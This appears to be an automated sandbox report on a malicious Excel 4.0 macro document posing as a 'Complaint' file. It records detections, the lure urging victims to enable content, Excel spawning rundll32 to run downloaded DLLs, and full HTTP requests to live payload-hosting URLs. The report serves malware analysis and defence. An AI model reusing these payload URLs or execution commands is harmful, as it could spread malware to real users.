Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-1091191320-02182021.xls

Overview

General Information

Sample Name:Complaint-1091191320-02182021.xls
Analysis ID:356327
MD5:da47abb08bf5ab8ccd6dde8b8395585d
SHA1:f4ffc845ceb85dee839ac85228ff410d9a01bd33
SHA256:91b4e89cdfe2e0d0f29642b21d4035ee4201f99e24e5ec841d4c8bb73547cd78

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2320 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2704 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 960 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2472 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2296 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2444 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-1091191320-02182021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xae34:$e1: Enable Editing
  • 0xae7e:$e1: Enable Editing
  • 0x1590e:$e1: Enable Editing
  • 0x15958:$e1: Enable Editing
  • 0x20405:$e1: Enable Editing
  • 0x2044f:$e1: Enable Editing
  • 0xae9c:$e2: Enable Content
  • 0x15976:$e2: Enable Content
  • 0x2046d:$e2: Enable Content

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2320, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 2704

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://chandni.pk/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: malware
Source: http://batikentklinik.com/qtuofsxtov/44249951829861100000.datAvira URL Cloud: Label: malware
Source: http://7ruzezendegi.com/samsgtlfwzt/44249951829861100000.datAvira URL Cloud: Label: malware
Source: http://7ruzezendegi.com/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Complaint-1091191320-02182021.xlsMetadefender: Detection: 13%Perma Link
Source: Complaint-1091191320-02182021.xlsReversingLabs: Detection: 37%

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
Source: global trafficDNS query: name: dindorf.com.ar
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 181.88.192.136:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 181.88.192.136:80
Source: Joe Sandbox ViewIP Address: 192.185.16.95 192.185.16.95
Source: global trafficHTTP traffic detected: GET /ntpnttfypqs/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dindorf.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /samsgtlfwzt/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qtuofsxtov/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: batikentklinik.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ictrljsfuh/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chandni.pkConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chandni.pkConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 22 Feb 2021 21:51:12 GMTServer: nginx/1.19.5Content-Type: text/htmlContent-Length: 315Vary: Accept-EncodingContent-Encoding: gzipX-Server-Cache: falseData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 91 d1 4f c2 30 10 c6 df fd 2b 6a 13 7d 1b 1d 8a 89 d1 76 26 0e 54 92 c9 88 cc 18 9f 4c 59 6f ac c9 b6 ce ee 26 f2 df cb 56 10 0d f7 f6 fb 72 f7 f5 eb 1d 3f 1d c7 61 f2 3e 9f 90 1c cb 82 cc 5f ef a3 69 48 a8 c7 d8 db 65 c8 d8 38 19 93 a7 e4 39 22 a3 81 3f 24 89 95 55 a3 51 9b 4a 16 8c 4d 66 34 38 e1 dd 58 70 42 5c f1 1c a4 fa a5 7d 71 d4 58 40 10 9a 0a 65 8a 64 d1 d6 b5 b1 c8 99 93 8f ba 4b 40 b9 4d 83 b5 07 9f ad fe 12 b4 1b 84 0a bd 64 53 03 25 a9 23 41 11 be 91 75 cf df 92 34 97 b6 01 14 2d 66 de 35 3d c4 61 ff f2 f0 a5 51 1b 52 4a bb d2 d5 5a 2b cc 05 f5 e9 8e 73 d0 ab 1c 7b a1 80 0c 9d d8 23 9a fa 40 c7 69 75 66 65 09 64 e7 37 f4 fd 33 4a f6 66 8e fa 86 a5 b1 0a 6c 6f b8 08 5f e2 28 9a ce 1e 05 95 2d 1a 7a 94 a8 b1 a9 a0 dd 02 6e 18 cb d6 aa 69 ea 41 6a 4a 76 a7 2a 61 21 03 0b f6 43 01 42 8a e7 b5 56 e2 6a 1e 47 a3 87 8b 78 44 03 ce 5c 9a 3f 0b e8 be bc bd 12 73 67 fa 01 31 ba ab ae ee 01 00 00 Data Ascii: eO0+j}v&TLYo&Vr?a>_iHe89"?$UQJMf48XpB\}qX@edK@MdS%#Au4-f5=aQRJZ+s{#@iufed73Jflo_(-zniAjJv*a!CBVjGxD\?sg1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: global trafficHTTP traffic detected: GET /ntpnttfypqs/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dindorf.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /samsgtlfwzt/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qtuofsxtov/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: batikentklinik.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ictrljsfuh/44249951829861100000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chandni.pkConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: chandni.pkConnection: Keep-Alive
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: dindorf.com.ar
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://batikentklinik.com/wp-json/>; rel="https://api.w.org/"X-Litespeed-Cache-Control: public,max-age=3600X-Litespeed-Tag: 164_HTTP.404,164_404,164_URL.13aed0d0174f3be9038c17f54db51e93,164_Transfer-Encoding: chunkedDate: Mon, 22 Feb 2021 21:49:24 GMTServer: LiteSpeedConnection: Keep-AliveData Raw: 35 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 4b 65 6e 74 20 4b 6c 69 6e 69 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4b 65 6e 74 20 4b 6c 69 6e 69 6b 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4b 65 6e 74 20 4b 6c 69 6e 69 6b 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 35 66 35 66 35 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 4b 65 6e 74 20 4b 6c 69 6e 69 6b 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 62 61 74 69 6b 65 6e 74 6b 6c 69 6e 69 6b 2e 63 6f 6d 2f 71 74 75 6f 66 73 78 74 6f 76 2f 34 34 32 34 39 39 35 3
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Complaint-1091191320-02182021.xlsInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enabk " 14 from the yellow bar above NuOll I XA I 15 R nn|| I f? I .
Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANN
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOTOPEN THIS DOCUMENT? 19 20
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Complaint-1091191320-02182021.xlsInitial sample: EXEC
Source: Complaint-1091191320-02182021.xlsOLE indicator, VBA macros: true
Source: Complaint-1091191320-02182021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal88.expl.evad.winXLS@11/9@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\8DCE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC689.tmpJump to behavior
Source: Complaint-1091191320-02182021.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: Complaint-1091191320-02182021.xlsMetadefender: Detection: 13%
Source: Complaint-1091191320-02182021.xlsReversingLabs: Detection: 37%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
